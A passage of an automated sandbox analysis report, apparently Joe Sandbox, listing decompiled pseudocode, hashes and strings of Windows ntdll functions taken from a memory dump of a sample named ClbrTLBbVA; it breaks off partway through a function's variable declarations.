                                        • Opcode ID: 9b2dcce0ebf7de870036ccf0a5e6c34b97ea655562f5ea400c6a3c3628440a0e
                                        • Instruction ID: af1bf7aaa24c4f2d2b318d0fa0dc2e09b717e56eb746a1eb4fc313f40c79ff0e
                                        • Opcode Fuzzy Hash: 9b2dcce0ebf7de870036ccf0a5e6c34b97ea655562f5ea400c6a3c3628440a0e
                                        • Instruction Fuzzy Hash: 4411BF393047028BEB294F1DAC9073676D7EB96E24F2445AEE562CB791DB70C8428361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E01758DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t35;
                                        				void* _t41;
                                        
                                        				_t40 = __esi;
                                        				_t39 = __edi;
                                        				_t38 = __edx;
                                        				_t35 = __ecx;
                                        				_t34 = __ebx;
                                        				_push(0x74);
                                        				_push(0x1780d50);
                                        				E016FD0E8(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                        					E01735720(0x65, 0, "Critical error detected %lx\n", _t35);
                                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        						asm("int3");
                                        						 *(_t41 - 4) = 0xfffffffe;
                                        					}
                                        				}
                                        				 *(_t41 - 4) = 1;
                                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                        				 *((intOrPtr*)(_t41 - 0x64)) = L016FDEF0;
                                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                        				_push(_t41 - 0x70);
                                        				L016FDEF0(1, _t38);
                                        				 *(_t41 - 4) = 0xfffffffe;
                                        				return E016FD130(_t34, _t39, _t40);
                                        			}

                                        Strings
                                        • Critical error detected %lx, xrefs: 01758E21
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Critical error detected %lx
                                        • API String ID: 0-802127002
                                        • Opcode ID: 1264dbbfba77f34b07de039a0ec0f5878a06bc6a8292b7edb6ffd0f0c8696e03
                                        • Instruction ID: 63c1aac1871d737779d0a7d18f5c87273d4638d56a49ad21d9ab6f0d41c0a883
                                        • Opcode Fuzzy Hash: 1264dbbfba77f34b07de039a0ec0f5878a06bc6a8292b7edb6ffd0f0c8696e03
                                        • Instruction Fuzzy Hash: 911187B1D00348DBDF25DFB989057ACFBB1BB08310F24426EEA29AB292C3741602DF15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0173FF60
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                        • API String ID: 0-1911121157
                                        • Opcode ID: 729ed7dc415d8164cd0b3533fe48849bb33fcc5e712850d268dfffe9015e0b8a
                                        • Instruction ID: f4ca5f3ea2a282f8130bd5008d2887deef1cc88e6b92051179dee66d6a0e0ade
                                        • Opcode Fuzzy Hash: 729ed7dc415d8164cd0b3533fe48849bb33fcc5e712850d268dfffe9015e0b8a
                                        • Instruction Fuzzy Hash: 9C114071910145EFDF22EF94CC48F98BBB2FF48744F108058F6086B2A2C7389944CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E01775BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t296;
                                        				signed char _t298;
                                        				signed int _t301;
                                        				signed int _t306;
                                        				signed int _t310;
                                        				signed char _t311;
                                        				intOrPtr _t312;
                                        				signed int _t313;
                                        				void* _t327;
                                        				signed int _t328;
                                        				intOrPtr _t329;
                                        				intOrPtr _t333;
                                        				signed char _t334;
                                        				signed int _t336;
                                        				void* _t339;
                                        				signed int _t340;
                                        				signed int _t356;
                                        				signed int _t362;
                                        				short _t367;
                                        				short _t368;
                                        				short _t373;
                                        				signed int _t380;
                                        				void* _t382;
                                        				short _t385;
                                        				signed short _t392;
                                        				signed char _t393;
                                        				signed int _t395;
                                        				signed char _t397;
                                        				signed int _t398;
                                        				signed short _t402;
                                        				void* _t406;
                                        				signed int _t412;
                                        				signed char _t414;
                                        				signed short _t416;
                                        				signed int _t421;
                                        				signed char _t427;
                                        				intOrPtr _t434;
                                        				signed char _t435;
                                        				signed int _t436;
                                        				signed int _t442;
                                        				signed int _t446;
                                        				signed int _t447;
                                        				signed int _t451;
                                        				signed int _t453;
                                        				signed int _t454;
                                        				signed int _t455;
                                        				intOrPtr _t456;
                                        				intOrPtr* _t457;
                                        				short _t458;
                                        				signed short _t462;
                                        				signed int _t469;
                                        				intOrPtr* _t474;
                                        				signed int _t475;
                                        				signed int _t479;
                                        				signed int _t480;
                                        				signed int _t481;
                                        				short _t485;
                                        				signed int _t491;
                                        				signed int* _t494;
                                        				signed int _t498;
                                        				signed int _t505;
                                        				intOrPtr _t506;
                                        				signed short _t508;
                                        				signed int _t511;
                                        				void* _t517;
                                        				signed int _t519;
                                        				signed int _t522;
                                        				void* _t523;
                                        				signed int _t524;
                                        				void* _t528;
                                        				signed int _t529;
                                        
                                        				_push(0xd4);
                                        				_push(0x1781178);
                                        				E016FD0E8(__ebx, __edi, __esi);
                                        				_t494 = __edx;
                                        				 *(_t528 - 0xcc) = __edx;
                                        				_t511 = __ecx;
                                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                        				 *(_t528 - 0xbc) = __ecx;
                                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                        				_t427 = 0;
                                        				 *(_t528 - 0x74) = 0;
                                        				 *(_t528 - 0x9c) = 0;
                                        				 *(_t528 - 0x84) = 0;
                                        				 *(_t528 - 0xac) = 0;
                                        				 *(_t528 - 0x88) = 0;
                                        				 *(_t528 - 0xa8) = 0;
                                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                        				if( *(_t528 + 0x1c) <= 0x80) {
                                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                        					if(__eflags != 0) {
                                        						_t421 = E01774C56(0, __edx, __ecx, __eflags);
                                        						__eflags = _t421;
                                        						if(_t421 != 0) {
                                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                                        							E016ED000(0x410);
                                        							 *(_t528 - 0x18) = _t529;
                                        							 *(_t528 - 0x9c) = _t529;
                                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                        							E01775542(_t528 - 0x9c, _t528 - 0x84);
                                        						}
                                        					}
                                        					_t435 = _t427;
                                        					 *(_t528 - 0xd0) = _t435;
                                        					_t474 = _t511 + 0x65;
                                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                        					_t511 = 0x18;
                                        					while(1) {
                                        						 *(_t528 - 0xa0) = _t427;
                                        						 *(_t528 - 0xbc) = _t427;
                                        						 *(_t528 - 0x80) = _t427;
                                        						 *(_t528 - 0x78) = 0x50;
                                        						 *(_t528 - 0x79) = _t427;
                                        						 *(_t528 - 0x7a) = _t427;
                                        						 *(_t528 - 0x8c) = _t427;
                                        						 *(_t528 - 0x98) = _t427;
                                        						 *(_t528 - 0x90) = _t427;
                                        						 *(_t528 - 0xb0) = _t427;
                                        						 *(_t528 - 0xb8) = _t427;
                                        						_t296 = 1 << _t435;
                                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                        						__eflags = _t436 & _t296;
                                        						if((_t436 & _t296) != 0) {
                                        							goto L92;
                                        						}
                                        						__eflags =  *((char*)(_t474 - 1));
                                        						if( *((char*)(_t474 - 1)) == 0) {
                                        							goto L92;
                                        						}
                                        						_t301 =  *_t474;
                                        						__eflags = _t494[1] - _t301;
                                        						if(_t494[1] <= _t301) {
                                        							L10:
                                        							__eflags =  *(_t474 - 5) & 0x00000040;
                                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                        								L12:
                                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                        									goto L92;
                                        								}
                                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                        									goto L92;
                                        								}
                                        								__eflags = _t442 -  *(_t474 - 0x11);
                                        								if(_t442 !=  *(_t474 - 0x11)) {
                                        									goto L92;
                                        								}
                                        								L15:
                                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                                        								 *(_t528 - 0xc0) = _t306;
                                        								 *(_t528 - 0xa4) = _t306;
                                        								__eflags =  *0x17960e8;
                                        								if( *0x17960e8 != 0) {
                                        									__eflags = _t306 - 0x40;
                                        									if(_t306 < 0x40) {
                                        										L20:
                                        										asm("lock inc dword [eax]");
                                        										_t310 =  *0x17960e8; // 0x0
                                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                        										__eflags = _t311 & 0x00000001;
                                        										if((_t311 & 0x00000001) == 0) {
                                        											 *(_t528 - 0xa0) = _t311;
                                        											_t475 = _t427;
                                        											 *(_t528 - 0x74) = _t427;
                                        											__eflags = _t475;
                                        											if(_t475 != 0) {
                                        												L91:
                                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                        												goto L92;
                                        											}
                                        											asm("sbb edi, edi");
                                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                        											_t511 = _t498;
                                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                        											__eflags =  *(_t312 - 5) & 1;
                                        											if(( *(_t312 - 5) & 1) != 0) {
                                        												_push(_t528 - 0x98);
                                        												_push(0x4c);
                                        												_push(_t528 - 0x70);
                                        												_push(1);
                                        												_push(0xfffffffa);
                                        												_t412 = E016E9710();
                                        												_t475 = _t427;
                                        												__eflags = _t412;
                                        												if(_t412 >= 0) {
                                        													_t414 =  *(_t528 - 0x98) - 8;
                                        													 *(_t528 - 0x98) = _t414;
                                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                        													 *(_t528 - 0x8c) = _t416;
                                        													 *(_t528 - 0x79) = 1;
                                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                                        													__eflags = _t511;
                                        												}
                                        											}
                                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                        											__eflags = _t446 & 0x00000004;
                                        											if((_t446 & 0x00000004) != 0) {
                                        												__eflags =  *(_t528 - 0x9c);
                                        												if( *(_t528 - 0x9c) != 0) {
                                        													 *(_t528 - 0x7a) = 1;
                                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                        													__eflags = _t511;
                                        												}
                                        											}
                                        											_t313 = 2;
                                        											_t447 = _t446 & _t313;
                                        											__eflags = _t447;
                                        											 *(_t528 - 0xd4) = _t447;
                                        											if(_t447 != 0) {
                                        												_t406 = 0x10;
                                        												_t511 = _t511 + _t406;
                                        												__eflags = _t511;
                                        											}
                                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                        											 *(_t528 - 0x88) = _t427;
                                        											__eflags =  *(_t528 + 0x1c);
                                        											if( *(_t528 + 0x1c) <= 0) {
                                        												L45:
                                        												__eflags =  *(_t528 - 0xb0);
                                        												if( *(_t528 - 0xb0) != 0) {
                                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                        													__eflags = _t511;
                                        												}
                                        												__eflags = _t475;
                                        												if(_t475 != 0) {
                                        													asm("lock dec dword [ecx+edx*8+0x4]");
                                        													goto L100;
                                        												} else {
                                        													_t494[3] = _t511;
                                        													_t451 =  *(_t528 - 0xa0);
                                        													_t427 = E016E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                        													 *(_t528 - 0x88) = _t427;
                                        													__eflags = _t427;
                                        													if(_t427 == 0) {
                                        														__eflags = _t511 - 0xfff8;
                                        														if(_t511 <= 0xfff8) {
                                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                        															asm("sbb ecx, ecx");
                                        															__eflags = (_t451 & 0x000000e2) + 8;
                                        														}
                                        														asm("lock dec dword [eax+edx*8+0x4]");
                                        														L100:
                                        														goto L101;
                                        													}
                                        													_t453 =  *(_t528 - 0xa0);
                                        													 *_t494 = _t453;
                                        													_t494[1] = _t427;
                                        													_t494[2] =  *(_t528 - 0xbc);
                                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													__eflags =  *(_t528 + 0x14);
                                        													if( *(_t528 + 0x14) == 0) {
                                        														__eflags =  *[fs:0x18] + 0xf50;
                                        													}
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													__eflags =  *(_t528 + 0x18);
                                        													if( *(_t528 + 0x18) == 0) {
                                        														_t454 =  *(_t528 - 0x80);
                                        														_t479 =  *(_t528 - 0x78);
                                        														_t327 = 1;
                                        														__eflags = 1;
                                        													} else {
                                        														_t146 = _t427 + 0x50; // 0x50
                                        														_t454 = _t146;
                                        														 *(_t528 - 0x80) = _t454;
                                        														_t382 = 0x18;
                                        														 *_t454 = _t382;
                                        														 *((short*)(_t454 + 2)) = 1;
                                        														_t385 = 0x10;
                                        														 *((short*)(_t454 + 6)) = _t385;
                                        														 *(_t454 + 4) = 0;
                                        														asm("movsd");
                                        														asm("movsd");
                                        														asm("movsd");
                                        														asm("movsd");
                                        														_t327 = 1;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 = 0x68;
                                        														 *(_t528 - 0x78) = _t479;
                                        													}
                                        													__eflags =  *(_t528 - 0x79) - _t327;
                                        													if( *(_t528 - 0x79) == _t327) {
                                        														_t524 = _t479 + _t427;
                                        														_t508 =  *(_t528 - 0x8c);
                                        														 *_t524 = _t508;
                                        														_t373 = 2;
                                        														 *((short*)(_t524 + 2)) = _t373;
                                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                        														 *((short*)(_t524 + 4)) = 0;
                                        														_t167 = _t524 + 8; // 0x8
                                        														E016EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                        														_t529 = _t529 + 0xc;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                        														 *(_t528 - 0x78) = _t479;
                                        														_t380 =  *(_t528 - 0x80);
                                        														__eflags = _t380;
                                        														if(_t380 != 0) {
                                        															_t173 = _t380 + 4;
                                        															 *_t173 =  *(_t380 + 4) | 1;
                                        															__eflags =  *_t173;
                                        														}
                                        														_t454 = _t524;
                                        														 *(_t528 - 0x80) = _t454;
                                        														_t327 = 1;
                                        														__eflags = 1;
                                        													}
                                        													__eflags =  *(_t528 - 0xd4);
                                        													if( *(_t528 - 0xd4) == 0) {
                                        														_t505 =  *(_t528 - 0x80);
                                        													} else {
                                        														_t505 = _t479 + _t427;
                                        														_t523 = 0x10;
                                        														 *_t505 = _t523;
                                        														_t367 = 3;
                                        														 *((short*)(_t505 + 2)) = _t367;
                                        														_t368 = 4;
                                        														 *((short*)(_t505 + 6)) = _t368;
                                        														 *(_t505 + 4) = 0;
                                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                        														_t327 = 1;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 = _t479 + _t523;
                                        														 *(_t528 - 0x78) = _t479;
                                        														__eflags = _t454;
                                        														if(_t454 != 0) {
                                        															_t186 = _t454 + 4;
                                        															 *_t186 =  *(_t454 + 4) | 1;
                                        															__eflags =  *_t186;
                                        														}
                                        														 *(_t528 - 0x80) = _t505;
                                        													}
                                        													__eflags =  *(_t528 - 0x7a) - _t327;
                                        													if( *(_t528 - 0x7a) == _t327) {
                                        														 *(_t528 - 0xd4) = _t479 + _t427;
                                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                        														E016EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                        														_t529 = _t529 + 0xc;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 =  *(_t528 - 0x78) + _t522;
                                        														 *(_t528 - 0x78) = _t479;
                                        														__eflags = _t505;
                                        														if(_t505 != 0) {
                                        															_t199 = _t505 + 4;
                                        															 *_t199 =  *(_t505 + 4) | 1;
                                        															__eflags =  *_t199;
                                        														}
                                        														_t505 =  *(_t528 - 0xd4);
                                        														 *(_t528 - 0x80) = _t505;
                                        													}
                                        													__eflags =  *(_t528 - 0xa8);
                                        													if( *(_t528 - 0xa8) != 0) {
                                        														_t356 = _t479 + _t427;
                                        														 *(_t528 - 0xd4) = _t356;
                                        														_t462 =  *(_t528 - 0xac);
                                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                        														_t485 = 0xc;
                                        														 *((short*)(_t356 + 2)) = _t485;
                                        														 *(_t356 + 6) = _t462;
                                        														 *((short*)(_t356 + 4)) = 0;
                                        														_t211 = _t356 + 8; // 0x9
                                        														E016EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                        														E016EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                        														_t529 = _t529 + 0x18;
                                        														_t427 =  *(_t528 - 0x88);
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t505 =  *(_t528 - 0xd4);
                                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                        														 *(_t528 - 0x78) = _t479;
                                        														_t362 =  *(_t528 - 0x80);
                                        														__eflags = _t362;
                                        														if(_t362 != 0) {
                                        															_t222 = _t362 + 4;
                                        															 *_t222 =  *(_t362 + 4) | 1;
                                        															__eflags =  *_t222;
                                        														}
                                        													}
                                        													__eflags =  *(_t528 - 0xb0);
                                        													if( *(_t528 - 0xb0) != 0) {
                                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                        														_t458 = 0xb;
                                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                        														E016EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                        														_t529 = _t529 + 0xc;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                        														 *(_t528 - 0x78) = _t479;
                                        														__eflags = _t505;
                                        														if(_t505 != 0) {
                                        															_t241 = _t505 + 4;
                                        															 *_t241 =  *(_t505 + 4) | 1;
                                        															__eflags =  *_t241;
                                        														}
                                        													}
                                        													_t328 =  *(_t528 + 0x1c);
                                        													__eflags = _t328;
                                        													if(_t328 == 0) {
                                        														L87:
                                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                        														_t455 =  *(_t528 - 0xdc);
                                        														 *(_t427 + 0x14) = _t455;
                                        														_t480 =  *(_t528 - 0xa0);
                                        														_t517 = 3;
                                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                        															asm("rdtsc");
                                        															 *(_t427 + 0x3c) = _t480;
                                        														} else {
                                        															 *(_t427 + 0x3c) = _t455;
                                        														}
                                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                        														_t456 =  *[fs:0x18];
                                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                        														_t427 = 0;
                                        														__eflags = 0;
                                        														_t511 = 0x18;
                                        														goto L91;
                                        													} else {
                                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                        														__eflags = _t519;
                                        														 *(_t528 - 0x8c) = _t328;
                                        														do {
                                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                        																_t334 =  *_t519;
                                        															} else {
                                        																_t334 = 0;
                                        															}
                                        															_t336 = _t334 & 0x000000ff;
                                        															__eflags = _t336;
                                        															_t427 =  *(_t528 - 0x88);
                                        															if(_t336 == 0) {
                                        																_t481 = _t479 + _t506;
                                        																__eflags = _t481;
                                        																 *(_t528 - 0x78) = _t481;
                                        																E016EF3E0(_t479 + _t427, _t457, _t506);
                                        																_t529 = _t529 + 0xc;
                                        															} else {
                                        																_t340 = _t336 - 1;
                                        																__eflags = _t340;
                                        																if(_t340 == 0) {
                                        																	E016EF3E0( *(_t528 - 0xb8), _t457, _t506);
                                        																	_t529 = _t529 + 0xc;
                                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                        																} else {
                                        																	__eflags = _t340 == 0;
                                        																	if(_t340 == 0) {
                                        																		__eflags = _t506 - 8;
                                        																		if(_t506 == 8) {
                                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        															_t339 = 0x10;
                                        															_t519 = _t519 + _t339;
                                        															_t263 = _t528 - 0x8c;
                                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                                        															__eflags =  *_t263;
                                        															_t479 =  *(_t528 - 0x78);
                                        														} while ( *_t263 != 0);
                                        														goto L87;
                                        													}
                                        												}
                                        											} else {
                                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                        												 *(_t528 - 0xa2) = _t392;
                                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                        												__eflags = _t469;
                                        												while(1) {
                                        													 *(_t528 - 0xe4) = _t511;
                                        													__eflags = _t392;
                                        													_t393 = _t427;
                                        													if(_t392 != 0) {
                                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                                        													}
                                        													_t395 = (_t393 & 0x000000ff) - _t427;
                                        													__eflags = _t395;
                                        													if(_t395 == 0) {
                                        														_t511 = _t511 +  *_t469;
                                        														__eflags = _t511;
                                        													} else {
                                        														_t398 = _t395 - 1;
                                        														__eflags = _t398;
                                        														if(_t398 == 0) {
                                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                        														} else {
                                        															__eflags = _t398 == 1;
                                        															if(_t398 == 1) {
                                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                        																_t402 =  *_t469 & 0x0000ffff;
                                        																 *(_t528 - 0xac) = _t402;
                                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                        															}
                                        														}
                                        													}
                                        													__eflags = _t511 -  *(_t528 - 0xe4);
                                        													if(_t511 <  *(_t528 - 0xe4)) {
                                        														break;
                                        													}
                                        													_t397 =  *(_t528 - 0x88) + 1;
                                        													 *(_t528 - 0x88) = _t397;
                                        													_t469 = _t469 + 0x10;
                                        													__eflags = _t397 -  *(_t528 + 0x1c);
                                        													_t392 =  *(_t528 - 0xa2);
                                        													if(_t397 <  *(_t528 + 0x1c)) {
                                        														continue;
                                        													}
                                        													goto L45;
                                        												}
                                        												_t475 = 0x216;
                                        												 *(_t528 - 0x74) = 0x216;
                                        												goto L45;
                                        											}
                                        										} else {
                                        											asm("lock dec dword [eax+ecx*8+0x4]");
                                        											goto L16;
                                        										}
                                        									}
                                        									_t491 = E01774CAB(_t306, _t528 - 0xa4);
                                        									 *(_t528 - 0x74) = _t491;
                                        									__eflags = _t491;
                                        									if(_t491 != 0) {
                                        										goto L91;
                                        									} else {
                                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                        										goto L20;
                                        									}
                                        								}
                                        								L16:
                                        								 *(_t528 - 0x74) = 0x1069;
                                        								L93:
                                        								_t298 =  *(_t528 - 0xd0) + 1;
                                        								 *(_t528 - 0xd0) = _t298;
                                        								_t474 = _t474 + _t511;
                                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                        								_t494 = 4;
                                        								__eflags = _t298 - _t494;
                                        								if(_t298 >= _t494) {
                                        									goto L100;
                                        								}
                                        								_t494 =  *(_t528 - 0xcc);
                                        								_t435 = _t298;
                                        								continue;
                                        							}
                                        							__eflags = _t494[2] | _t494[3];
                                        							if((_t494[2] | _t494[3]) == 0) {
                                        								goto L15;
                                        							}
                                        							goto L12;
                                        						}
                                        						__eflags = _t301;
                                        						if(_t301 != 0) {
                                        							goto L92;
                                        						}
                                        						goto L10;
                                        						L92:
                                        						goto L93;
                                        					}
                                        				} else {
                                        					_push(0x57);
                                        					L101:
                                        					return E016FD130(_t427, _t494, _t511);
                                        				}
                                        			}










































































                                        0x01776360
                                        0x00000000
                                        0x01776360
                                        0x01775c10
                                        0x01775c10
                                        0x017763da
                                        0x017763e5
                                        0x017763e5

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4846cbfcd6982912839ce92d63a55ad91042bbcccfe0bf44ace4b0e8144ed918
                                        • Instruction ID: 705ed7471de152acb2a3bb1c4078536118fbb47ece2587683b2a8fac13ad1df1
                                        • Opcode Fuzzy Hash: 4846cbfcd6982912839ce92d63a55ad91042bbcccfe0bf44ace4b0e8144ed918
                                        • Instruction Fuzzy Hash: A5424B75900629CFEB24CF68C880BA9FBB1FF49304F1581EAE94DAB246D7749985CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E016C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                        				signed int _v8;
                                        				void* _v20;
                                        				signed int _v24;
                                        				char _v532;
                                        				char _v540;
                                        				signed short _v544;
                                        				signed int _v548;
                                        				signed short* _v552;
                                        				signed short _v556;
                                        				signed short* _v560;
                                        				signed short* _v564;
                                        				signed short* _v568;
                                        				void* _v570;
                                        				signed short* _v572;
                                        				signed short _v576;
                                        				signed int _v580;
                                        				char _v581;
                                        				void* _v584;
                                        				unsigned int _v588;
                                        				signed short* _v592;
                                        				void* _v597;
                                        				void* _v600;
                                        				void* _v604;
                                        				void* _v609;
                                        				void* _v616;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				unsigned int _t161;
                                        				signed int _t162;
                                        				unsigned int _t163;
                                        				void* _t169;
                                        				signed short _t173;
                                        				signed short _t177;
                                        				signed short _t181;
                                        				unsigned int _t182;
                                        				signed int _t185;
                                        				signed int _t213;
                                        				signed int _t225;
                                        				short _t233;
                                        				signed char _t234;
                                        				signed int _t242;
                                        				signed int _t243;
                                        				signed int _t244;
